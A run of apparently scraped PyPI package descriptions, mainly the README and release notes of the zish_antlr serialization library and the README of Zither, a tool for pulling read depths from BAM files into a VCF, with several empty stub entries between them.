    ...         '19th century',
    ...     ],
    ... }
    >>>
    >>> # Output it as a Zish string
    >>> zish_str = dumps(book)
    >>> print(zish_str)
    {
      "description": null,
      "key": 'a3NoaGdybA==',
      "number_of_novellas": 5,
      "price": 7.99,
      "read_date": 2017-07-16T14:05:00Z,
      "tags": [
        "russian",
        "novel",
        "19th century",
      ],
      "title": "A Hero of Our Time",
      "weight": 6.88,
      "would_recommend": true,
    }
    >>>
    >>> # Load the Zish string, to give us back the Python object
    >>> reloaded_book = loads(zish_str)
    >>>
    >>> # Print the title
    >>> print(reloaded_book['title'])
    A Hero of Our Time

Python To Zish Type Mapping

    Python Type          Zish Type
    bool                 bool
    int                  integer
    str                  string
    datetime.datetime    timestamp
    dict                 map
    decimal.Decimal      decimal
    float                decimal
    bytearray            bytes
    bytes                bytes
    list                 list
    tuple                list

Contributing

Useful link: ANTLR JavaDocs

To run the tests:

- Change to the zish_python_antlr directory: cd zish_python_antlr
- Create a virtual environment: python3 -m venv venv
- Activate the virtual environment: source venv/bin/activate
- Install tox: pip install tox
- Run tox: tox

The core parser is created using ANTLR from the Zish grammar. To create the parser files, go to the zish/antlr directory, download the ANTLR jar and then run the following command:

    java -jar antlr-4.11.1-complete.jar -Dlanguage=Python3 Zish.g4

Making A New Release

- Run tox to make sure all tests pass.
- Update the Release Notes section.
- Ensure build and twine are installed: pip install wheel twine

Then do:

    git tag -a x.y.z -m "version x.y.z"
    rm -r dist
    python -m build
    twine upload --sign dist/*

Release Notes

Version 0.0.14 (2022-10-30)
- The U+00A0 NO-BREAK SPACE is now treated as whitespace.

Version 0.0.13 (2021-04-04)
- Trailing commas in lists and maps are now allowed.

Version 0.0.12 (2017-09-07)
- Rename to zish_antlr to distinguish it from zish.

Version 0.0.11 (2017-09-07)
- Upload to PyPI failed for previous release.

Version 0.0.10 (2017-09-07)
- Allow lists and sets as keys to maps.

Version 0.0.9 (2017-08-24)
- Fix bug where int was being parsed as Decimal.
- Make bytes type return a bytes rather than a bytearray.

Version 0.0.8 (2017-08-24)
- Container types aren't allowed as map keys.
- Performance improvements.

Version 0.0.7 (2017-08-22)
- Fix bug with UTC timestamp formatting.

Version 0.0.6 (2017-08-22)
- Fix bug in timestamp formatting.
- Add note about comments.

Version 0.0.5 (2017-08-18)
- Fix bug where dumps fails for a tuple.

Version 0.0.4 (2017-08-15)
- Simplify integer types.

Version 0.0.3 (2017-08-09)
- Fixed bug where the interpreter couldn't find the zish.antlr package in eggs.
- Removed a few superfluous escape sequences.

Version 0.0.2 (2017-08-05)
- Now uses RFC3339 for timestamps.

Version 0.0.1 (2017-08-03)
- Fix bug where an EOF could cause an infinite loop.

Version 0.0.0 (2017-08-01)
- First public release. Passes all the tests.
zisraw
No description available on PyPI.
zissou
No description available on PyPI.
zit
No description available on PyPI.
zita
No description available on PyPI.
zitan
This project is used to display ...
zither
Command-line tool to pull raw depths and alt freqs from BAM file(s) based on an existing VCF, writing output as a new VCF to stdout.

The official repository is at: https://github.com/umich-brcf-bioinf/Zither

Quickstart

Read a single BAM file

    $ zither --bam examples/explicit_bam/Sample_X.bam examples/explicit_bam/input.vcf > output.vcf

Given a VCF and a BAM file, reads positions in the input VCF and corresponding pileups from Sample_X.bam.

Read a set of matched VCF sample names and BAM files

    $ zither examples/matching_names/input.vcf > output.vcf

Given a VCF and a collection of BAM files whose file names match the VCF sample names, reads positions from the input VCF and corresponding BAM pileups.

Explicitly map VCF sample names to BAM files

    $ zither --mapping_file=examples/mapping_files/mapping_file.txt examples/mapping_files/input.vcf > output.vcf

Given a VCF, a collection of BAMs, and a file that maps sample names to BAM paths, reads positions from the input VCF and corresponding pileups from the mapped BAM files.

The mapping file is a tab-separated text file where each line has a sample name and the path to the corresponding BAM file. Paths to BAM files can be absolute or relative; relative paths are resolved relative to the directory that contains the mapping file.

Contact [email protected] for support and questions.
UM BRCF Bioinformatics Core

Changelog

0.2 (9/3/2015)
- Adjusted tags to include total and unfiltered depth and alt freq.
- Added basecall quality filtering
- Added depth cutoff
- Added support for Python3

0.1 (8/6/2015)
- Initial Release

Zither is written and maintained by the University of Michigan BRCF Bioinformatic Core; individual contributors include:
- Chris Gates
- Divya Kriti
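For illustration only (the sample names and paths below are invented, not taken from Zither's bundled examples), a mapping file in the tab-separated format described above might contain:

    Sample_A	/data/bams/Sample_A.bam
    Sample_B	bams/Sample_B.bam

Each line pairs a VCF sample name with the BAM file to pile up for that sample; the second path is relative, so it would be resolved against the directory containing the mapping file.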
ziti
No description available on PyPI.
zitncov
test Module
zitro1992-gamedev
No description available on PyPI.
ziu
ziu

File manager